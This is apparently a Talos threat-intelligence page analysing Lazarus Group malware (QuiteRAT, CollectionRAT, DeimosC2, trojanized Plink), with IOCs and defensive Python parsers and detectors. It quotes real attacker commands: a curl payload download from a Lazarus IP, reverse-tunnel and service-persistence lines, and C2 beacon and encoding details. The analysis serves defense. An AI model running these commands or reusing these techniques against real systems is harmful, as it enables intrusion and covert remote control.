ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in "One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK." Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe
MD5: 49ae44d48c8ff0ee1b23a310cb2ecf5a
Typical Filename: nYzVlQyRnQmDcXk
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440
MD5: ef6ff172bf3e480f1d633a6c53f7a35e
Typical Filename: iizbpyilb.bat
Claimed Product: N/A
Detection Name: Trojan.Agent.DDOH

SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf
MD5: 2cfc15cb15acc1ff2b2da65c790d7551
Typical Filename: rcx4d83.tmp
Claimed Product: N/A
Detection Name: Win.Dropper.Pykspa::tpd

Lazarus Group's infrastructure reuse leads to discovery of new malware

24 August 2023 at 12:04
  • In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability, to deploy multiple threats. In addition to their "QuiteRAT" malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called "CollectionRAT."
  • CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
  • Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.
  • One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.

Lazarus Group reuses infrastructure in continuous assault on enterprises

In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs), many of which are publicly known, highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.

Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called "MagicRAT," along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.

Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. That report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT, known as "QuiteRAT," that Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog. QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but, judging by its size, QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier-to-deploy malicious implant.

In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.

Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.

The connections between the various malware are depicted below:

Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2

CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.

CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.

Implant's configuration strings.

The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.

Initial check-in over HTTP to C2 server.

CollectionRAT and its link to EarlyRAT

Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from "OSPREY VIDEO INC." with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the "Jupiter" malware. DCSO CyTec’s blog contains more details about Jupiter.

Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT

Adoption of open source tools during initial access β€” DeimosC2

Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on custom-built implants such as MagicRAT, VSingle, DTrack and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools, credential-dumping tools such as Mimikatz, and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a Go-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.

DeimosC2 analysis

Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.

The implant itself is an unmodified copy of the regular beacon that the DeimosC2 server produces when configured with the required parameters. It contains the standard URI paths, unchanged from the out-of-the-box configuration of the implant. The lack of heavy customization indicates that the operators of DeimosC2 in this campaign may still be in the process of adopting the framework and adapting it to their needs.

Configuration in the DeimosC2 implant.

Trend Micro has an excellent analysis of DeimosC2, but the implants typically have various RAT capabilities such as:

  • Execute arbitrary commands on the endpoint.
  • Credential stealing and registry dumping.
  • Download and upload files from C2.
  • Shellcode execution.
  • Uninstallation of the implant.

Malicious Plink

Another open-source tool we observed Lazarus Group using is PuTTY Link (Plink), which the group uses for reverse tunneling. In the past, we’ve observed Lazarus Group use Plink to establish a remote tunnel using commands such as:

pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

Here -N opens no remote shell (tunnel only), and -R 18118:127.0.0.1:8118 makes the remote server listen on port 18118 and forward any connection it receives back to port 8118 on the local machine (127.0.0.1), exposing a service on the compromised host to the attacker-controlled server.

However, we found that Lazarus Group has now started building malicious Plink binaries from PuTTY’s source code with the reverse tunnel command string embedded in the binary itself. The following figure shows a comparison of:

  • The malicious Plink binary on the left, which contains the embedded reverse tunnel command with switches in the format:

Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username] -pw [password] <Remote_IP>

  • A benign Plink binary on the right, which Lazarus used in 2022 as part of their hands-on-keyboard activity.

A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.

The malicious Plink will also create a mutex named "Global\WindowsSvchost" before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.
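To make the tunnel direction concrete, here is an added example, written for this edit and not Lazarus tooling or Talos code, that parses Plink-style command lines of the shape shown above into a structured description and flags the -N plus -R combination as a reverse tunnel. The option semantics (-N, -R, -L, -P, -l, -pw, user@host) are PuTTY's documented ones; the binary names, ports, credentials and 203.0.113.x addresses in the sample command lines are constructed placeholders, not the campaign's real values.

```python
"""Parse Plink (PuTTY Link) tunnel command lines into a structured description.

Added example for this post; it is not Lazarus Group tooling or Talos code.
Plink option semantics (-N, -R, -L, -P, -l, -pw, user@host) are PuTTY's own.
The command lines under __main__ are constructed for illustration; 203.0.113.x
is a documentation range, not a real C2 address.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Mutex the post attributes to the trojanized Plink; a companion host indicator.
KNOWN_MUTEX = r"Global\WindowsSvchost"


@dataclass
class PlinkTunnel:
    binary: str
    c2_host: str
    c2_port: int = 22                     # Plink defaults to SSH on 22 when -P is absent
    username: Optional[str] = None
    no_shell: bool = False                # -N: no remote shell, tunnel only
    remote_forwards: List[Dict] = field(default_factory=list)   # -R entries
    local_forwards: List[Dict] = field(default_factory=list)    # -L entries
    has_inline_password: bool = False     # -pw seen (value intentionally not stored)


def _parse_forward(spec: str) -> Dict:
    """'[bind_addr:]listen_port:target_host:target_port' -> dict (IPv4/hostnames only)."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts = [None] + parts
    if len(parts) != 4:
        raise ValueError(f"unrecognised forward spec: {spec!r}")
    bind, listen, host, port = parts
    return {"bind": bind, "listen_port": int(listen),
            "target_host": host, "target_port": int(port)}


def parse_plink_cmdline(cmdline: str) -> PlinkTunnel:
    """Whitespace-tokenised parse; quoted arguments containing spaces are not handled."""
    tokens = cmdline.split()
    if not tokens:
        raise ValueError("empty command line")
    binary, host, user, port = tokens[0], None, None, 22
    no_shell, has_pw = False, False
    remote: List[Dict] = []
    local: List[Dict] = []
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-N":
            no_shell = True
        elif tok in ("-R", "-L"):
            i += 1
            (remote if tok == "-R" else local).append(_parse_forward(tokens[i]))
        elif tok == "-P":
            i += 1
            port = int(tokens[i])
        elif tok == "-l":
            i += 1
            user = tokens[i]
        elif tok == "-pw":
            i += 1
            has_pw = True                 # skip the value; never persist credentials
        elif tok.startswith("-"):
            pass                          # -ssh, -batch, -v ...: no effect on tunnel shape
        elif host is None:
            host = tok                    # first non-option token is [user@]host
        else:
            break                         # anything after the host is a remote command
        i += 1
    if host is None:
        raise ValueError("no target host in command line")
    if "@" in host and user is None:
        user, host = host.split("@", 1)
    return PlinkTunnel(binary, host, port, user, no_shell, remote, local, has_pw)


def is_reverse_tunnel(t: PlinkTunnel) -> bool:
    """The shape the post describes: no shell plus at least one -R forward, so the
    C2 side can reach a service on the compromised host through the SSH session."""
    return t.no_shell and bool(t.remote_forwards)


def describe(t: PlinkTunnel) -> str:
    who = f"{t.username}@" if t.username else ""
    lines = [f"{t.binary}: SSH to {who}{t.c2_host}:{t.c2_port}"
             + (" (inline password)" if t.has_inline_password else "")]
    for f in t.remote_forwards:
        lines.append(f"  remote side listens on {f['listen_port']} -> "
                     f"local {f['target_host']}:{f['target_port']}")
    for f in t.local_forwards:
        lines.append(f"  local side listens on {f['listen_port']} -> "
                     f"remote {f['target_host']}:{f['target_port']}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed samples shaped like the two command lines in the post.
    for cmd in (
        "pvhost.exe -N -R 18118:127.0.0.1:8118 -P 443 -l op -pw s3cr3t 203.0.113.10",
        "Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l op -pw s3cr3t 203.0.113.10",
        "plink -ssh admin@203.0.113.20 -L 8080:10.0.0.5:80",
    ):
        t = parse_plink_cmdline(cmd)
        print(describe(t), "| reverse tunnel" if is_reverse_tunnel(t) else "| not a reverse tunnel")
```

The embedded variant described above has no command line to parse, but the same argument string sits in the binary's strings output, so running the parser over each `-N ... -R ...` string recovered from a sample gives the same structured result.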

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: 62248, 62253-62255.

IOCs

IOCs for this research can also be found in our GitHub repository here.

Hashes

QuiteRAT

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6

CollectionRAT

db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984

773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df

DeimosC2

05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d

Trojanized Plink

e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe

Network IOCs

146[.]4[.]21[.]94

109[.]248[.]150[.]13

108[.]61[.]186[.]55:443

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php

hxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php

hxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php

hxxp[://]109[.]248[.]150[.]13/EsaFin[.]exe

hxxp[://]146[.]4[.]21[.]94/boards/boardindex[.]php

hxxp[://]146[.]4[.]21[.]94/editor/common/cmod

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

24 August 2023 at 12:02
  • Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.
  • In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as "QuiteRAT." Security researchers first discovered this implant in February, but little has been written on it since then.
  • QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.
  • Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, .NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

Lazarus Group compromises internet backbone infrastructure company in Europe

In early 2023, we observed Lazarus Group compromise an internet backbone infrastructure provider in Europe and deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. Successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to download the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command: C:\windows\system32\cmd.exe /c systeminfo | findstr Logon
Intent: Get the logon server name (machine name). System Information Discovery [T1082]

Command: C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix
Intent: Get the domain name for the system. Domain Account Discovery [T1087.002]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

Diagram: ManageEngine ServiceDesk exploitation -> cURL download of notify.exe by the Java process -> QuiteRAT execution -> C2 check-in and reconnaissance commands -> persistence via sc create.
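Each step above (a shell spawned by the ServiceDesk Java process pulling a binary into c:\users\public, the systeminfo/ipconfig reconnaissance, and the sc create persistence whose binpath is cmd /K start) leaves a process-creation record. The following added example, not Talos detection content, expresses the three stages as matching rules over constructed Sysmon-style events (image, parent_image, cmdline) and reports whether the full chain is present. cURL is what the post shows; certutil and bitsadmin are included as an assumed generalisation of the download stage. 203.0.113.5 is a documentation address standing in for the real C2, and all events are constructed.

```python
"""Match process-creation events against the QuiteRAT host behaviours in this post.

Added example; not Talos detection content. Events are plain dicts with the
fields a Sysmon Event ID 1 / EDR process-creation record carries (image,
parent_image, cmdline). The sample events are constructed and 203.0.113.5 is a
documentation address, not the campaign's C2.
"""
import re
from typing import Dict, List, Tuple

# curl is what the post shows; certutil/bitsadmin are an assumed generalisation.
DOWNLOADERS = r"(?:curl|certutil|bitsadmin)"


def _java_spawns_downloader_to_public(e: Dict) -> bool:
    """Exploited ServiceDesk: the Java process spawns a shell that pulls a payload into c:\\users\\public."""
    return (re.search(r"\\javaw?\.exe$", e["parent_image"], re.I) is not None
            and re.search(rf"\b{DOWNLOADERS}\b", e["cmdline"], re.I) is not None
            and re.search(r"\\users\\public\\", e["cmdline"], re.I) is not None)


def _recon_findstr(e: Dict) -> bool:
    """The two reconnaissance commands the post lists as QuiteRAT's first actions."""
    return re.search(r"(systeminfo\s*\|\s*findstr\s+logon|ipconfig\s*\|\s*findstr\s+suffix)",
                     e["cmdline"], re.I) is not None


def _sc_create_cmd_start(e: Dict) -> bool:
    """Service persistence whose binpath is 'cmd /K start <exe>' rather than a real service binary."""
    return (re.search(r"\bsc(?:\.exe)?\s+create\b", e["cmdline"], re.I) is not None
            and re.search(r'binpath=\s*"?cmd(?:\.exe)?\s+/k\s+start\b', e["cmdline"], re.I) is not None)


RULES = {
    "java_spawns_downloader_to_public": _java_spawns_downloader_to_public,
    "recon_findstr_logon_or_suffix": _recon_findstr,
    "sc_create_binpath_cmd_start": _sc_create_cmd_start,
}


def evaluate(events: List[Dict]) -> List[Tuple[str, Dict]]:
    """Return (rule_name, event) for every event that matches a rule, in event order."""
    return [(name, e) for e in events for name, rule in RULES.items() if rule(e)]


def chain_complete(hits: List[Tuple[str, Dict]]) -> bool:
    """True when download, reconnaissance and persistence all appear in the hit set."""
    return {name for name, _ in hits} == set(RULES)


# Constructed events: four shaped like the post's chain, two benign look-alikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\ManageEngine\ServiceDesk\jre\bin\java.exe",
     "cmdline": r"cmd.exe /c curl http://203.0.113.5/tmp/tmp/comp.dat -o c:\users\public\notify.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"c:\users\public\notify.exe",
     "cmdline": r"C:\windows\system32\cmd.exe /c systeminfo | findstr Logon"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"c:\users\public\notify.exe",
     "cmdline": r"C:\windows\system32\cmd.exe /c ipconfig | findstr Suffix"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"c:\users\public\notify.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c sc create WindowsNotification type= own type= interact "
                r"start= auto error= ignore binpath= cmd /K start c:\users\public\notify.exe"},
    # benign: an admin's ipconfig, and an installer registering a normal service binary
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c ipconfig /all"},
    {"image": r"C:\Windows\System32\sc.exe", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'sc create VendorUpdater binpath= "C:\Program Files\Vendor\updater.exe" start= auto'},
]

if __name__ == "__main__":
    hits = evaluate(SAMPLE_EVENTS)
    for name, e in hits:
        print(f"{name:36s} {e['cmdline'][:70]}")
    print("full chain observed:", chain_complete(hits))
```

The service rule deliberately keys on the binpath shape rather than the service name, since "WindowsNotification" is trivially changed between victims while launching a user-writable executable through cmd /K start is the durable oddity.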

Lazarus Group evolves malicious arsenal with QuiteRAT

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications and is immensely popular for building graphical user interfaces. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, neither implant has a graphical user interface. As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966), which has a Kenna risk score of 100 out of 100, to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];...<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Configuration strings encoded in the malware.
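As an added example, not QuiteRAT's or Talos' code, the encoding the post describes (XOR each byte with 0x78, then base64) is implemented below together with its inverse and a small carver that tries every base64-looking run in a blob as an encoded string. The blob, the .invalid URL inside it and the carver's heuristics are constructed for this edit; the real configuration strings are the ones shown in the figure above.

```python
"""Encode/decode QuiteRAT-style configuration strings and carve them from a blob.

Added example for this post, not QuiteRAT's own code: it implements the scheme
the post describes (XOR every byte with 0x78, then base64) and its inverse.
The sample blob and the URL inside it are constructed; .invalid is a reserved
TLD, so nothing here points at real infrastructure.
"""
import base64
import re
import string
from typing import List

XOR_KEY = 0x78
_PRINTABLE = set(string.printable) - set("\x0b\x0c")
# Runs of base64 alphabet long enough to be worth trying; padding optional.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")


def encode_config_string(plain: str) -> str:
    """plain -> base64(plain XOR 0x78), the order the post gives for the stored strings."""
    xored = bytes(b ^ XOR_KEY for b in plain.encode("utf-8"))
    return base64.b64encode(xored).decode("ascii")


def decode_config_string(encoded: str) -> str:
    """Inverse: base64-decode, then XOR each byte with 0x78."""
    raw = base64.b64decode(encoded, validate=True)   # binascii.Error (a ValueError) on bad input
    return bytes(b ^ XOR_KEY for b in raw).decode("utf-8", errors="replace")


def carve_config_strings(blob: bytes, min_len: int = 8) -> List[str]:
    """Try every base64-looking run in a binary or memory dump as an encoded config string.

    Keeps candidates that decode to printable text of at least min_len chars.
    Plain ASCII that happens to be valid base64 also survives XOR 0x78 as
    printable, so expect some noise; URL, host and User-Agent shapes stand out.
    """
    found = []
    for m in _B64_RUN.finditer(blob):
        try:
            cand = decode_config_string(m.group().decode("ascii"))
        except ValueError:          # wrong length or padding: not a complete base64 string
            continue
        if len(cand) >= min_len and all(ch in _PRINTABLE for ch in cand):
            found.append(cand)
    return found


# Constructed stand-in for a QuiteRAT data section: a PE-ish header, the encoded C2 URL,
# an all-0xFF base64 run (decodes to non-printable bytes, so it is filtered) and a
# clear-text UA string whose "Gecko/20100101" run is not valid base64 length-wise.
CONSTRUCTED_C2 = "http://c2.example.invalid/resource/main/rawmail.php"
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + encode_config_string(CONSTRUCTED_C2).encode("ascii") + b"\x00\x00"
    + b"////////////////" + b"\x00"
    + b"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\x00"
)

if __name__ == "__main__":
    enc = encode_config_string(CONSTRUCTED_C2)
    print("encoded:", enc)
    print("decoded:", decode_config_string(enc))
    print("carved :", carve_config_strings(SAMPLE_BLOB))
```

Because a single-byte XOR preserves byte alignment, the carver needs no key search: if a sample ever moves to a different key, changing XOR_KEY (or looping over all 256 values and keeping the one that yields the most printable candidates) is the only adjustment.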

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter: mailid
Value: <12 chars from MD4>
Description: The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)

Parameter: action
Value: "inbox" (send check-in beacon) or "sent" (data is being sent to the C2)
Description: Signifies the action being taken

Parameter: body
Value: <base64_xorred_data>
Description: Data to be sent to the C2.

Parameter: param
Value: <Internal/Local IP address>
Description: The internal/LAN IP address of the infected endpoint.

Parameter: session
Value: <rand>
Description: Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=inbox&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET verb. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&action=sent&body=<base64_xorred_data>&param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is at most 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
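The beacon shape above (a fixed User-Agent and a query made of mailid, action, param and session) is enough to hunt for in proxy logs. The following is an added example, not Talos detection content, that parses that query out of constructed log lines, validates each field (12 hex characters, inbox or sent, a numeric session, an RFC 1918 address in param) and cross-checks param against the logging client. The log format, the 203.0.113.9 C2 address and the body value are constructed for this edit.

```python
"""Flag QuiteRAT-style C2 beacons in web proxy log lines.

Added example for this post; not Talos detection content. It keys on the URL
shape and User-Agent the post documents (mailid=<12 hex>&action=inbox|sent
&param=<internal IP>&session=<number>). The log format and every address below
are constructed; 203.0.113.9 is a documentation address, not a real C2.
"""
import re
from ipaddress import ip_address
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlparse

QUITERAT_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0"
_MAILID = re.compile(r"^[0-9a-f]{12}$", re.I)
# Constructed proxy format: <timestamp> <client_ip> <method> <url> <status> "<user-agent>"
_LOG = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def parse_beacon_url(url: str) -> Optional[Dict]:
    """Return the beacon fields if the URL has QuiteRAT's query shape, else None.

    The post shows the query both after '/' and after '?', so we locate
    'mailid=' directly rather than relying on a '?' separator.
    """
    pos = url.find("mailid=")
    if pos < 0:
        return None
    qs = parse_qs(url[pos:], keep_blank_values=True)
    mailid = qs.get("mailid", [""])[0]
    action = qs.get("action", [""])[0]
    session = qs.get("session", [""])[0]
    if not _MAILID.match(mailid) or action not in ("inbox", "sent") or not session.isdigit():
        return None
    param = qs.get("param", [""])[0]
    try:
        internal_ip = param if ip_address(param).is_private else None
    except ValueError:
        internal_ip = None
    return {"mailid": mailid.lower(), "action": action, "session": int(session),
            "internal_ip": internal_ip, "has_body": "body" in qs}


def scan_proxy_log(lines: List[str]) -> List[Dict]:
    """Return one enriched record per line whose URL parses as a beacon."""
    hits = []
    for line in lines:
        m = _LOG.match(line)
        if not m:
            continue
        ts, client, _method, url, _status, ua = m.groups()
        beacon = parse_beacon_url(url)
        if beacon is None:
            continue
        beacon.update(
            timestamp=ts, client=client, c2=urlparse(url).netloc,
            ua_match=(ua == QUITERAT_UA),
            # param should be the client's own LAN address; a mismatch is worth a look too
            param_matches_client=(beacon["internal_ip"] == client),
        )
        hits.append(beacon)
    return hits


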